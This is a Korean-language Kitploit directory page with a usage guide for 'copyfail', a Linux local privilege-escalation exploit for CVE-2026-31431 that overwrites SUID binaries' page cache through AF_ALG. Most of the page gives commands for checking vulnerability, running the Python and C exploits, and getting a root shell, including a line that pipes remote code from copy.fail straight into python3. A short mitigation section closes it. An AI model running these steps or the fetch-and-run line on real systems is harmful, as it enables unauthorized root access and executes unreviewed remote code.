Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
copyfail — CVE-2026-31431에 대한 Linux 로컬 권한 상승 익스플로잇으로, AF_ALG 커널 암호화 API를 통해 SUID 바이너리의 페이지 캐시를 덮어써 root 권한을 획득합니다. | Kitploit
도구/GitHubGitHub/minime794/copyfail
Privilege EscalationVulnerability AnalysisExploitationBinary Exploitation
GitHubminime794/copyfail

copyfail

CVE-2026-31431에 대한 Linux 로컬 권한 상승 익스플로잇으로, AF_ALG 커널 암호화 API를 통해 SUID 바이너리의 페이지 캐시를 덮어써 root 권한을 획득합니다.

저장소 보기
6시간 40분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Copy Fail (CVE-2026-31431) – 익스플로잇 사용 가이드

원본 Readme는 @painoob에서 가져옴

2017 / 2016 이후의 모든 커널 버전이 취약함 ! 커널 7은 완전히 면역, 그 외(5-7 사이)는 여전히 취약할 수 있음

⚠️ 면책 조항

이 콘텐츠는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다. 명시적 허가 없이 시스템에서 실행하지 마십시오.


📌 개요

Copy Fail (CVE-2026-31431) 은 AF_ALG를 통해 커널 crypto API에 영향을 미치는 Linux 로컬 권한 상승(LPE) 취약점입니다.

이는 비권한 사용자가 SUID 바이너리(예: /usr/bin/su)의 페이지 캐시 데이터를 덮어쓰고 root 접근 권한을 얻을 수 있게 합니다.


🧠 요구 사항

시스템 요구 사항

  • Linux 커널 (취약함 – 패치 상태에 따라 다름)
  • AF_ALG 활성화됨
  • algif_aead 모듈 로드됨

Python 익스플로잇 요구 사항

  • Python 3.10+
  • 다음에 대한 지원:
    • os.splice
    • socket(AF_ALG)

🔍 취약점 확인

root@kitploit:~
uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg

예상 지표:

  • authencesn(hmac(sha256),cbc(aes))
  • algif_aead 로드됨

🐍 Python 익스플로잇 실행

1. 직접 실행

root@kitploit:~
python3 copy_fail_exp.py

2. 또는 curl을 통해 (원격 호스팅된 경우)

root@kitploit:~
curl https://copy.fail/exp | python3

3. root 셸 트리거

root@kitploit:~
su
id

예상 결과:

root@kitploit:~
uid=0(root)

⚠️ 일반적인 문제 (Python)

❌ 오류: os.splice not found

원인:

  • Python 버전 < 3.10
  • 제한된 빌드

해결 방법:

  • 더 새로운 Python 바이너리 사용
  • 정적 Python 인터프리터 업로드

⚙️ C 버전 컴파일

1. 컴파일

root@kitploit:~
gcc copy_fail_exp.c -o copy_fail

2. 실행 파일로 만들기

root@kitploit:~
chmod +x copy_fail

3. 익스플로잇 실행

root@kitploit:~
./copy_fail
su

⚠️ 일반적인 문제 (C)

❌ 익스플로잇이 실행되지만 root가 되지 않음

가능한 원인:

  • 커널이 패치됨
  • 잘못된 오프셋
  • 환경 불일치

❌ 컴파일 오류

필요한 도구 설치:

root@kitploit:~
apt update && apt install build-essential

🧪 문제 해결

시스템이 패치되었는지 확인

root@kitploit:~
dmesg | grep -i alg

모듈 확인

root@kitploit:~
lsmod | grep algif_aead

🛡️ 완화

취약한 모듈 비활성화

root@kitploit:~
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead

커널 패치 적용

시스템 업데이트:

root@kitploit:~
apt update && apt upgrade

📌 참고 사항

  • 익스플로잇은 페이지 캐시만 수정함 (비영구적)
  • 로컬 접근 필요
  • 기본적으로 원격 익스플로잇 불가

🧠 최종 통찰

익스플로잇이 실패하면 다음을 고려하십시오:

  • 커널이 이미 패치됨
  • 환경 제한
  • 대체 권한 상승 벡터 (SUID, capabilities, sudo 잘못된 구성)

📚 참고 자료

  • https://copy.fail/
  • CVE-2026-31431

👨‍💻 작성자 노트

이 익스플로잇은 랩, CTF, 승인된 침투 테스트에서만 책임감 있게 사용하십시오.

도구 다운로드